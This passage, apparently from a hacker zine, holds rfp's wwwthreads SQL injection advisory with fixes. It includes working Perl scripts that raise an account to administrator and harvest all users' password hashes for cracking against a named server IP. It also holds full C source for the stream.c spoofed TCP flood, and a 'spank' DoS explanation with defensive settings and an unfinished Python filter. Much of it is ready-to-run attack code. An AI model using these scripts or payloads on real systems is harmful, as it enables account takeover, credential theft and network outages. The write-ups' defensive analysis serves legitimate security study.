    Display,View,PostsPer,EReplies,Security,Registered)
    VALUES ($Username_q,$Email_q,0,$date,$Status_q,$config{'sort'},
    $Display_q,$View_q,$config{'postsperpage'},$EReplies_q,$Security,$date)
!;

Now, I should take a moment here and explain the quote() function.
A string value of "blah blah blah", when stuck into a query that looks like "SELECT * FROM table WHERE data=$data", will wind up looking like

SELECT * FROM table WHERE data=blah blah blah

which is not valid. The database doesn't know what to do with the extra two blahs, since they look like commands. Therefore all string data needs to be encapsulated in single quotes ('), and the query should look like

SELECT * FROM table WHERE data='blah blah blah'

which is correct. Now, in my SQL appension article I talk about 'breaking out' of the single-quoted string by including your own single quote. So if we submitted "blah blah' MORE SQL COMMANDS...", it would look like

SELECT * FROM table WHERE data='blah blah' MORE SQL COMMANDS...'
                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                               data we submitted

This causes the SQL engine to interpret the MORE SQL COMMANDS as actual SQL commands, since it figured the 'data' part of the string ended with the second single quote (the one we submitted). This is a drawback of converting data into a 'human readable' string to be parsed back into data again... it's hard to determine what's 'code/commands' and what's 'data'.

All is not lost, however. Submitting a '' (two single quotes) tells the SQL engine NOT to end the data string, but rather to treat it as a single quote in the data context. Therefore the following query

SELECT * FROM table WHERE data='data''more data'

makes the database look for the value "data'more data". So to keep people from breaking out of strings and submitting extra SQL commands, all you have to do is double up every single quote (turn ' into ''). This will ensure that all data is indeed considered data. And this is what the DBI->quote() function does: it puts single quotes around the string, and doubles all single quotes in the string.

So after all of that explanation, the short of it is that anything that is run through quote() is of no use to us, because we can't submit extra SQL commands or otherwise tamper with anything fun.
And if you look, wwwthreads uses quote() extensively. So this may be rough. But all is not lost...

You see, there are different field types. You can have strings, boolean values, various numeric values, etc. While a string field needs to be in the format of field='data', a numeric field doesn't use the '' (wwwthreads writes numeric_field=2, not numeric_field='2'). Ah ha! There's no quotes to deal with, so quote() never gets involved. The correct solution is to make sure all numeric field data is indeed numeric (more on this later). But I'll give you a hint... wwwthreads doesn't go that far (nor do most applications, actually).

So, now we need a SQL statement that preferably deals with a table we are interested in. A SELECT statement (retrieves data) is tougher, since we'll need to include a whole other query to do something other than SELECT. INSERT and UPDATE are nice because we're already modifying data... we can just ride in more data to update (hopefully). Poking around brings us to a very nice spot... changeprofile.pl. This is the script that takes data entered in editprofile.pl and enters the changes into the database. Of course, the profile is our user profile. This means to use this, we need a valid user account. In any event, let's have a look-see...
# Format the query words
my $Password_q    = $dbh -> quote($Password);
my $Email_q       = $dbh -> quote($Email);
my $Fakeemail_q   = $dbh -> quote($Fakeemail);
my $Name_q        = $dbh -> quote($Name);
my $Signature_q   = $dbh -> quote($Signature);
my $Homepage_q    = $dbh -> quote($Homepage);
my $Occupation_q  = $dbh -> quote($Occupation);
my $Hobbies_q     = $dbh -> quote($Hobbies);
my $Location_q    = $dbh -> quote($Location);
my $Bio_q         = $dbh -> quote($Bio);
my $Username_q    = $dbh -> quote($Username);
my $Display_q     = $dbh -> quote($Display);
my $View_q        = $dbh -> quote($View);
my $EReplies_q    = $dbh -> quote($EReplies);
my $Notify_q      = $dbh -> quote($Notify);
my $FontSize_q    = $dbh -> quote($FontSize);
my $FontFace_q    = $dbh -> quote($FontFace);
my $ICQ_q         = $dbh -> quote($ICQ);
my $Post_Format_q = $dbh -> quote($Post_Format);
my $Preview_q     = $dbh -> quote($Preview);

Ack! Practically everything is quoted! That means all those parameters are useless to us. And let's peek at the final actual query that sticks all our information back into the database

# Update the User's profile
my $query =qq!
    UPDATE Users
    SET    Password    = $Password_q,
           Email       = $Email_q,
           Fakeemail   = $Fakeemail_q,
           Name        = $Name_q,
           Signature   = $Signature_q,
           Homepage    = $Homepage_q,
           Occupation  = $Occupation_q,
           Hobbies     = $Hobbies_q,
           Location    = $Location_q,
           Bio         = $Bio_q,
           Sort        = $Sort,
           Display     = $Display_q,
           View        = $View_q,
           PostsPer    = $PostsPer,
           EReplies    = $EReplies_q,
           Notify      = $Notify_q,
           TextCols    = $TextCols,
           TextRows    = $TextRows,
           FontSize    = $FontSize_q,
           FontFace    = $FontFace_q,
           Extra1      = $ICQ_q,
           Post_Format = $Post_Format_q,
           Preview     = $Preview_q
    WHERE  Username    = $Username_q
!;

Since wwwthreads nicely slaps the '_q' on the variables, it's easy to see. See it? $Sort, $PostsPer, $TextCols, and $TextRows aren't quoted.
Now, let's figure out where that data comes from

my $Sort     = $FORM{'sort_order'};
my $PostsPer = $FORM{'PostsPer'};
my $TextCols = $FORM{'TextCols'};
my $TextRows = $FORM{'TextRows'};

Wow, they're taken straight from the submitted form data. That means they are not checked or validated in any way. Here's our chance!

Going back to the structure of the user record (given above), there's a 'Status' field we need to change. Looking in this UPDATE query, Status isn't listed. So this means that the Status field is going to remain unchanged. Bummer.

See what we're going to do yet? Take a second and think about it. Remember, all of this hinges around the fact that we want to submit what looks like data, but in the end, the SQL engine/database will interpret it differently.

Notice in the query that the fields are listed in the format of field=value, field=value, field=value, etc. (of course, they're on separate lines). If I were to insert some fake values (for the sake of example), I might have

Name='rfp', Signature='rfp', Homepage='www.wiretrip.net/rfp/'

All I did was put the fields on the same line, collapse the whitespace, and fill in the (quoted) string values. This is valid SQL. Now, let's put this all together. Looking at the 'Sort' variable (which is numeric), we would feasibly have

Bio='puppy', Sort=5, Display='threaded'

which is still valid SQL. Since $Sort=$FORM{'sort_order'}, that means the above value for Sort was given by submitting the parameter sort_order=5. Now, let's use Sort to our advantage. What if we were to include a comma, and then some more column values? Oh, say, the Status field? Let's set the sort_order parameter to "5, Status='Administrator'" (the query template supplies the comma that follows) and then let it run its course. Eventually we'll get a query that looks like

Bio='puppy', Sort=5, Status='Administrator', Display='threaded'
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^
                     our submitted data

This is still valid SQL! And furthermore, it will cause the database to update the Status field to be 'Administrator'!
But remember, when we looked in adduser.pl the first user had a Security level of 100. We want that too, so we just set the sort_order parameter to "5, Status='Administrator', Security=100" and then we get

Bio='puppy', Sort=5, Status='Administrator', Security=100, ...

which updates both values to what we want. The database, not knowing any better, will update those two fields, and now the forums will think we're an administrator.

So I go to apply this new technique on PacketStorm... and get a 404 for requests to changeprofile.pl. Yep, the pro version doesn't have it. Navigating the 'Edit Profile' menu, I see that it has 'Basic Profile', 'Display Preferences', and 'Email Notifications/Subscriptions', which the demo does not (it's all lumped together). Wonderful. If they changed the scripts around, they may have also changed the SQL queries (well, they had to, actually). So now we're in 'blackbox' mode (blindly making educated guesses on what's going on).

Since we want to play with the sort_order parameter still, you'll see that it's contained in the 'Display Preferences' script (editdisplay.pl). This script handles the sort_order, display, view, PostsPer, Post_Format, Preview, TextCols, TextRows, FontSize, FontFace, PictureView, and PicturePost parameters (gained by viewing the HTML source). So it's a subset of the parameters. Using the above code snippets, we can guess at what the SQL query looks like. So why not give it a shot.

First I poke some invalid values into sort_order (characters instead of numbers). This causes an error, which I figured. Since, in the first example, the fields of the 'Board' table were prefixed with 'B_', the 'User' table (which we are now using) prefixes its columns with 'U_'. So that means we need to use 'U_Status' and 'U_Security' for field names. Good thing we checked. Since this needs to be a valid form submit, we need to submit values for all of the listed variables.
At this point I should also point out (again) that we need a valid user account whose status we will increase. We'll need the username and password (hash), which are printed as hidden form elements on various forms (like editdisplay.pl). You'll see the parameters are Username and Oldpass. So based on all of this, we can construct a URL that looks like

changedisplay.pl?
    Cat=&
    Username=rfp
    &Oldpass=(valid password hash)
    &sort_order=5,U_Status%3d'Administrator',U_Security%3d100
    &display=threaded
    &view=collapsed
    &PostsPer=10
    &Post_Format=top
    &Preview=on
    &TextCols=60
    &TextRows=5
    &FontSize=0
    &FontFace=
    &PictureView=on
    &PicturePost=off

The important one of course being

&sort_order=5,U_Status%3d'Administrator',U_Security%3d100

which is just an escaped version of what we used above (the %3d translates to the '=' character). When you lump it all together into a single string, you get

changedisplay.pl?Cat=&Username=rfp&Oldpass=(valid password hash)&sort_order=5,U_Status%3d'Administrator',U_Security%3d100&display=threaded&view=collapsed&PostsPer=10&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0&FontFace=&PictureView=on&PicturePost=off

which, while gross, is what it needs to be. So, I submit this to PacketStorm, and get

Your display preferences have been modified.

Wonderful. But, noticing the top menu, I see an 'Admin' option now. I click it, and what do I see but the heart-warming message of

As an Administrator the following options are available to you.

Bingo! Administrator privileges! Looking at my options, I can edit users, boards, or forums, assign moderators and administrators, ban users/hosts, expire/close/open threads, etc.

Now for our second objective... the passwords. I go into 'Show/Edit Users', and am asked to pick the first letter of the usernames I'm interested in. So I pick 'R'. A list of all 'R*' users comes up. I click on 'rfp'. And there we go, my password hash. Unfortunately, there's no nice and easy way to dump all users and their hashes.
Bummer. So I automated a perl script to do it for me, and dump the output in a format that can be fed into John the Ripper.

----[ 3. Solution

Now, how to defend against this? As you saw, the reason this worked was due to unrestricted data being passed straight into SQL queries. Luckily wwwthreads quoted (most) string data, but they didn't touch numeric data. The solution is to make sure numeric data is indeed numeric. You can do it the 'silent' way by using a function like so

sub onlynumbers { ($data=shift)=~tr/0-9//cd; return $data;}

And similar to how all string data is passed through DBI->quote(), pass all numeric data through onlynumbers(). So, for the above example, it would be better to use

my $Sort = onlynumbers($FORM{'sort_order'});

Note that the 'silent' way strips the offending characters rather than rejecting the request: the payload "5,Status='Administrator',Security=100" collapses to the digits 5100 and the update goes through with that value. If you would rather fail loudly, check that the value matches ^[0-9]+$ and abort otherwise.

Another area that needs to be verified is the table name. In our very first example, we had 'Board=general'. As you see here, a table name is not quoted like a string. Therefore we also need to run all table names through a function to clean them up as well. Assuming table names can have letters, numbers, and periods, we can scrub it with

sub scrubtable { ($data=shift)=~tr/a-zA-Z0-9.//cd; return $data;}

which will remove all other cruft.

In the end, *all* (let me repeat that... **ALL**) incoming user data should be passed through quote(), onlynumbers(), or scrubtable()... NO EXCEPTIONS! Passing user data straight into a SQL query is asking for someone to tamper with your database. New versions of wwwthreads are available from www.wwwthreads.com, which implement the solutions pretty much as I've described them here.

----[ 4. Conclusion

I've included two scripts below. wwwthreads.pl will run the query for you against a pro version of wwwthreads. You just have to give the IP address of the server running wwwthreads, and a valid user and password hash. w3tpass.pl will walk and download all wwwthreads user password hashes, and give output suitable for password cracking with John the Ripper.
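The following is an added, runnable version of the numeric-field injection from section 2 and the section 3 fixes; it is not wwwthreads code and not part of rfp's advisory. The Users table is a constructed subset with only the columns the attack touches, SQLite stands in for MySQL, and quote(), onlynumbers() and scrubtable() follow the behaviour described above. The hardened handler adds driver-side parameter binding, which the article does not mention, as a second layer.

```python
"""wwwthreads-style numeric-field injection and its fixes, run against an
in-memory SQLite table.  Added example; schema and form data are constructed."""
import re
import sqlite3

SCHEMA = """
CREATE TABLE Users (
    Username TEXT PRIMARY KEY,
    Status   TEXT    NOT NULL DEFAULT 'User',
    Security INTEGER NOT NULL DEFAULT 10,
    Sort     INTEGER NOT NULL DEFAULT 1,
    Display  TEXT    NOT NULL DEFAULT 'threaded'
);
INSERT INTO Users (Username) VALUES ('rfp');
"""


def quote(value):
    """DBI->quote() as the article describes it: wrap in single quotes and
    double every embedded single quote."""
    return "'" + str(value).replace("'", "''") + "'"


def onlynumbers(value):
    """Perl: ($data=shift)=~tr/0-9//cd;  keep digits, silently drop the rest."""
    return re.sub(r"[^0-9]", "", str(value))


def scrubtable(value):
    """Perl: ($data=shift)=~tr/a-zA-Z0-9.//cd;"""
    return re.sub(r"[^A-Za-z0-9.]", "", str(value))


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def user_row(con, username):
    cur = con.execute(
        "SELECT Status, Security, Sort FROM Users WHERE Username = ?", (username,))
    return cur.fetchone()


def changedisplay_vulnerable(con, form):
    """Mirrors the changeprofile.pl UPDATE: strings go through quote(), the
    numeric Sort column is interpolated straight from the form."""
    query = "UPDATE Users SET Sort = %s, Display = %s WHERE Username = %s" % (
        form["sort_order"], quote(form["display"]), quote(form["Username"]))
    con.execute(query)
    con.commit()
    return query


def changedisplay_fixed(con, form):
    """Reject (rather than scrub) a non-numeric Sort, then let the driver
    bind every value so nothing from the form is ever parsed as SQL."""
    raw = str(form["sort_order"])
    if not re.fullmatch(r"[0-9]+", raw):
        raise ValueError("sort_order is not numeric: %r" % raw)
    con.execute("UPDATE Users SET Sort = ?, Display = ? WHERE Username = ?",
                (int(raw), form["display"], form["Username"]))
    con.commit()


# Constructed form submission carrying the payload from the article.
EVIL_FORM = {
    "Username": "rfp",
    "display": "threaded",
    "sort_order": "5, Status='Administrator', Security=100",
}


def demo_vulnerable():
    con = fresh_db()
    changedisplay_vulnerable(con, EVIL_FORM)
    return user_row(con, "rfp")      # ('Administrator', 100, 5)


def demo_fixed():
    con = fresh_db()
    try:
        changedisplay_fixed(con, EVIL_FORM)
    except ValueError:
        pass                          # request rejected, row left untouched
    return user_row(con, "rfp")      # ('User', 10, 1)


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("fixed:     ", demo_fixed())
    print("onlynumbers:", onlynumbers(EVIL_FORM["sort_order"]))
```

Running it shows the unquoted Sort value turning into three SET clauses and the row becoming Administrator/100, while the hardened handler refuses the request. The onlynumbers() line shows why the silent scrub alone is not ideal: the payload degrades to 5100 instead of being rejected.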
Thanks to PacketStorm for being a good sport about this.

- Rain Forest Puppy / rfp@wiretrip.net - I feel a rant coming on...

----[ 5. Included perl scripts

-[ wwwthreads.pl

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net

use Socket;

#####################################################
# modify these
# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";
#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
 "&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
 "&display=threaded&view=collapsed&PostsPer=10".
 "&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
 "&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
 "Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

print sendraw($tosend);

sub sendraw {
 my ($pstr)=@_;
 my $target;
 $target= inet_aton($ip) || die("inet_aton problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
  die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,80,$target)){
  select(S); $|=1;
  print $pstr;
  my @in=<S>;        # slurp the whole response from the socket
  select(STDOUT); close(S);
  return @in;
 } else { die("Can't connect...\n"); }
}

-[ w3tpass.pl

#!/usr/bin/perl
# download all wwwthread usernames/passwords once you're administrator
# send a fake cookie with authentication and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net

use Socket;

#####################################################
# modify these
# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv";
#####################################################

@letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ');

print STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists...";

# one showusers.pl request per starting letter, collecting every User= link
foreach $let (@letts){
 $parms="Cat=&Start=$let";
 $tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
  "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
  "Cookie: Username=$username; Password=$passhash\r\n\r\n";
 my @D=sendraw($tosend);
 foreach $line (@D){
  if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
   push @users, $1;}}}

$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
 "Fetching individual passwords...\r\n";

# one showoneuser.pl request per user; the hash is in the hidden OldPass field
foreach $user (@users){
 $parms="User=$user";
 $tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
  "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
  "Cookie: Username=$username; Password=$passhash\r\n\r\n";
 my @D=sendraw($tosend);
 foreach $line (@D){
  if($line=~/OldPass value = "([^"]+)"/){
   ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
   $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
   print $user.':'.$pass."::::::::::\n";    # passwd-style line for John
   last;}}}

print STDERR "done.\r\n\r\n";

sub sendraw {
 my ($pstr)=@_;
 my $target;
 $target= inet_aton($ip) || die("inet_aton problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
  die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,80,$target)){
  select(S); $|=1;
  print $pstr;
  my @in=<S>;        # slurp the whole response from the socket
  select(STDOUT); close(S);
  return @in;
 } else { die("Can't connect...\n"); }
}

# Greets to everyone who hasn't used RDS to deface a website (small crowd)

--- rain forest puppy / rfp@wiretrip.net ------------- ADM / wiretrip ---

SQL hacking has many ins, many outs; there's many levels of complexity...
--- Advisory RFP2K01 ------------------------------ rfp.labs ------------

@HWA

13.0 The stream.c exploit
~~~~~~~~~~~~~~~~~~~~

/* The header names were lost when the zine text was converted (the angle
   brackets were eaten).  The standard headers this code needs are restored
   below. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>

#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif

#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>
#include <arpa/inet.h>

#ifdef LINUX
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif

struct ip_hdr {
    u_int   ip_hl:4,        /* header length in 32 bit words */
            ip_v:4;         /* ip version */
    u_char  ip_tos;         /* type of service */
    u_short ip_len;         /* total packet length */
    u_short ip_id;          /* identification */
    u_short ip_off;         /* fragment offset */
    u_char  ip_ttl;         /* time to live */
    u_char  ip_p;           /* protocol */
    u_short ip_sum;         /* ip checksum */
    u_long  saddr, daddr;   /* source and dest address */
};

struct tcp_hdr {
    u_short th_sport;       /* source port */
    u_short th_dport;       /* destination port */
    u_long  th_seq;         /* sequence number */
    u_long  th_ack;         /* acknowledgement number */
    u_int   th_x2:4,        /* unused */
            th_off:4;       /* data offset */
    u_char  th_flags;       /* flags field */
    u_short th_win;         /* window size */
    u_short th_sum;         /* tcp checksum */
    u_short th_urp;         /* urgent pointer */
};

struct tcpopt_hdr {
    u_char  type;           /* type */
    u_char  len;            /* length */
    u_short value;          /* value */
};

struct pseudo_hdr {         /* See RFC 793 Pseudo Header */
    u_long  saddr, daddr;   /* source and dest address */
    u_char  mbz, ptcl;      /* zero and protocol */
    u_short tcpl;           /* tcp length */
};

struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
    /* struct tcpopt_hdr opt; */
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;

void usage(char *progname)
{
    /* the <dstaddr> <dstport> <pktsize> placeholders were also lost in the
       conversion and are restored from the three descriptions below */
    fprintf(stderr, "Usage: %s <dstaddr> <dstport> <pktsize>\n", progname);
    fprintf(stderr, "  dstaddr - the target we are trying to attack.\n");
    fprintf(stderr, "  dstport - the port of the target, 0 = random.\n");
    fprintf(stderr, "  pktsize - the extra size to use. 0 = normal syn.\n");
    exit(1);
}

/* This is a reference internet checksum implementation, not very fast */
static inline u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    /* Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }
    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *) w;
        sum += answer;
    }
    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */
    sum += (sum >> 16);                   /* add carry */
    answer = ~sum;                        /* truncate to 16 bits */
    return(answer);
}

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
        fprintf(stderr, "Could not resolve %s.\n", hostname);
        exit(1);
    }
    return *(u_long *)hp->h_addr;
}

void flooder(void)
{
    struct timespec ts;
    int i;

    memset(&packet, 0, sizeof(packet));
    ts.tv_sec = 0;
    ts.tv_nsec = 10;

    packet.ip.ip_hl = 5;
    packet.ip.ip_v = 4;
    packet.ip.ip_p = IPPROTO_TCP;
    packet.ip.ip_tos = 0x08;
    packet.ip.ip_id = rand();
    packet.ip.ip_len = FIX(sizeof(packet));
    packet.ip.ip_off = 0;                 /* IP_DF? */
    packet.ip.ip_ttl = 255;
    packet.ip.ip_dst.s_addr = random();
    packet.tcp.th_flags = 0;
    packet.tcp.th_win = htons(16384);
    packet.tcp.th_seq = random();
    packet.tcp.th_ack = 0;
    packet.tcp.th_off = 5;                /* 5 */
    packet.tcp.th_urp = 0;
    packet.tcp.th_dport = dstport?htons(dstport):rand();
    /* packet.opt.type = 0x02;
       packet.opt.len = 0x04;
       packet.opt.value = htons(1460); */
    cksum.pseudo.daddr = dstaddr;
    cksum.pseudo.mbz = 0;
    cksum.pseudo.ptcl = IPPROTO_TCP;
    cksum.pseudo.tcpl = htons(sizeof(struct tcphdr));

    s_in.sin_family = AF_INET;
    s_in.sin_addr.s_addr = dstaddr;
    s_in.sin_port = packet.tcp.th_dport;

    for(i=0;;++i) {
        /* patched by 3APA3A to send 1 syn packet + 1023 ACK packets. */
        if( !(i&0x4FF) ) {
            packet.tcp.th_sport = rand();
            cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random();
            packet.tcp.th_flags = TH_SYN;
            packet.tcp.th_ack = 0;
        } else {
            packet.tcp.th_flags = TH_ACK;
            packet.tcp.th_ack = random();
        }
        /* cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); */
        ++packet.ip.ip_id;
        /*++packet.tcp.th_sport*/;
        ++packet.tcp.th_seq;

        if (!dstport)
            s_in.sin_port = packet.tcp.th_dport = rand();

        packet.ip.ip_sum = 0;
        packet.tcp.th_sum = 0;
        cksum.tcp = packet.tcp;

        packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
        packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));

        if (sendto(sock, &packet, sizeof(packet), 0,
                   (struct sockaddr *)&s_in, sizeof(s_in)) < 0)
            perror("jess");
    }
}

int main(int argc, char *argv[])
{
    int on = 1;

    printf("stream.c v1.0 - TCP Packet Storm\n");

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("socket");
        exit(1);
    }
    setgid(getgid());
    setuid(getuid());

    if (argc < 4)
        usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
        perror("setsockopt");
        exit(1);
    }

    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nResolving IPs...");
    fflush(stdout);
    dstaddr = lookup(argv[1]);
    dstport = atoi(argv[2]);
    pktsize = atoi(argv[3]);
    printf("Sending...");
    fflush(stdout);

    flooder();
    return 0;
}

@HWA

14.0 Spank,
variation of the stream.c DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ------------------------------------------------ Explanation of the 'spank' attack -- a new breed stream/raped ------------------------------------------------ By: lst (yardley@uiuc.edu) This is a tad different than the previous release. Stream/Raped mearly flooded the host with ack's (or no flags) and came from random ips with random sequence numbers and/or ack numbers. The difference now is that this not only does the previous stuff, but also directly attacks from and to multicast addresses as well. Just as before, rate limiting should be done to counteract its effect (the same idea as ICMP_BANDLIM). The multicast handling should also be checked to verify that it is behaving properly. The attacker specifies the port[s] that they want to send the attack to, depending on what ports are selected, you will have different net results. If the port is an open port, then you will possibly have a longer kernel path to follow before the drop. Therefore, a smart attacker will hit open ports, but havoc can also come about from random ports due to states and processing. In the best case scenario, you will experience only the lag of the flood and the lag of the processing (currently) and then be fine when the attacker stops, In the worst case, you lockup, kill the network, and possibly have to reboot. Once you patch it, you deal with a lot less processing time (the drops are handled without the RST flag when appropriate--bandlim type idea). In other words, you go to the drop routine instead of dropwithrst silencing your response, which decreases your processing time, the hit on your network, and the effect of the flood (once a threshold is reached, all those bad packets are silently dropped and the attack has less of a net effect). The filters that were presented at the beginning of this email will block all multicast packets that come out (and in) the tcp stack I have been getting mailed a lot about this. 
Here is why I said the previous statement. Receiving a packet with no flags is considered an illegal packet (obviously) and is often dumped; however, as we have seen in the past, illegal packets often wreak havoc and often go untested. There is very little that "raped.c" or "stream.c" actually showed as problems in the TCP/IP stacks. The true problem lies more in the effects of the response (caused by the attack). This is the same concept as the SYN floods of yesteryear, and the same type of thing will be done to handle it. The main difference is that it will be on a simpler note because there isn't much need for a "cookie" based system. One should just throttle the response of the reset packets, which in turn will help stop the storm that you generate and, in general, harden the tcp/ip stack to behave the way it is supposed to.

The main effect of this attack is that you are shooting back RST+ACK's at all the spoofed hosts. Obviously, a lot of these hosts will not exist and you will get ICMP unreaches (as an example) bounced back at you. There are other possibilities as well, but unreach would be the most common (redirects might be common as well although i did not spend the time to analyze that). The ones that don't respond back may send you some packets back as well (depending on if the port was valid or not and what their firewall rules are). This type of attack is complicated by the multicasts, and the effect is amplified as well. All in all, it becomes very nasty very quick. Basically, this causes a nice little storm of packets, in the ideal case.

Note that I said ideal case in the previous paragraph. This is not always the observed behavior. It all depends on what is on the subnet, what type of packets are received, what rules and filters you have setup, and even the duration of the flood. It has been pointed out several times that the machine will go back to normal once the attack is stopped, which is exactly why something like ICMP_BANDLIM will work.

I have also been asked a lot about what this "bug" affects. I have seen it have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has also seemed to affect some hubs, switches, routers, or gateways since entire subnets have "disappeared" briefly after the attack. The multicast attack seems to be more deadly to the network than the previous attack and its effects get amplified and even carried over to the rest of the network (bypassing secluded network bounds). I don't have more specifics on the systems affected because of the difficulty in testing it (and keeping the network up) since I do not have local access to the networks that I tested on, and remote access gets real ugly real fast.

Another possibility that has been suggested as to why some machines die is that the machine's route table is being blown up by the spoofed packets. Each spoofed packet has a different source address which means that a temporary route table entry is being created for each one. These entries take time to timeout. Use 'vmstat -m' and check the 'routetbl' field while the attack is going on.

Route table entries can be controlled somewhat under freebsd with:

[root@solid]::[~] sysctl -a | fgrep .rt
net.inet.ip.rtexpire: 3600
net.inet.ip.rtminexpire: 10
net.inet.ip.rtmaxcache: 128

You can do the following, to help if the route table is at least part of the problem:

sysctl -w net.inet.ip.rtexpire=2
sysctl -w net.inet.ip.rtminexpire=2

Things that will help:

1. Drop all multicast packets (ingress and egress) that are addressed to the tcp stack because multicasts are not valid for tcp.

2. Extend bandwidth limiting to include RST's, ACK's and anything else that you feel could affect the stability of the machine.

3. Don't look for listening sockets if the packet is not a syn.

I hope that this helps, or explains a little more at least.
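The three items above, as an added example that is not part of lst's write-up or of any vendor's stack: a small Python ingress filter that drops multicast TCP on sight, refuses to look up listening sockets for anything but a SYN, and puts the RST reply behind a token bucket in the spirit of ICMP_BANDLIM, so that once the per-second budget is spent the rest of a spoofed flood is dropped silently instead of being reflected. The addresses, ports and the ten-RST-per-second budget are constructed values for the demonstration; the verdict names and the segment class are mine.

```python
# Added example: toy filter for the three mitigations in the spank write-up.
import ipaddress
import time
from collections import Counter
from dataclasses import dataclass

# TCP flag bits as defined in <netinet/tcp.h>
TH_FIN, TH_SYN, TH_RST, TH_ACK = 0x01, 0x02, 0x04, 0x10

# All IPv4 multicast space; TCP never legitimately uses it as source or destination.
MULTICAST = ipaddress.ip_network("224.0.0.0/4")


@dataclass
class TcpSegment:
    src: str
    dst: str
    sport: int
    dport: int
    flags: int


class RstLimiter:
    """Token bucket capping the number of RST replies per second.

    Same idea as ICMP_BANDLIM applied to RSTs: once the budget is spent,
    further unwanted segments are dropped silently instead of answered, so a
    spoofed flood cannot turn this host into a RST reflector.
    """

    def __init__(self, per_second, clock=time.monotonic):
        self.rate = float(per_second)
        self.tokens = float(per_second)
        self.clock = clock
        self.last = clock()

    def allow(self):
        now = self.clock()
        self.tokens = min(self.rate, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


def decide(seg, listening_ports, limiter):
    """Classify one segment as 'accept', 'rst' (answer with RST) or 'drop' (silent).

    The filter keeps no connection table, so every non-SYN segment is treated
    as arriving without state, which is exactly what a stream/spank flood is.
    """
    src, dst = ipaddress.ip_address(seg.src), ipaddress.ip_address(seg.dst)
    # 1. multicast is never valid for TCP: drop on ingress and egress alike
    if src in MULTICAST or dst in MULTICAST:
        return "drop"
    # 3. only a SYN may open a connection, so no listening-socket lookup otherwise
    if not (seg.flags & TH_SYN):
        if seg.flags & TH_RST:
            return "drop"            # a RST is never answered with a RST
        # 2. the RST reply is bandwidth-limited; over budget it is dropped silently
        return "rst" if limiter.allow() else "drop"
    if seg.dport in listening_ports:
        return "accept"
    return "rst" if limiter.allow() else "drop"


def run_filter(segments, listening_ports, per_second, clock=time.monotonic):
    """Apply decide() to every segment and return a Counter of verdicts."""
    limiter = RstLimiter(per_second, clock)
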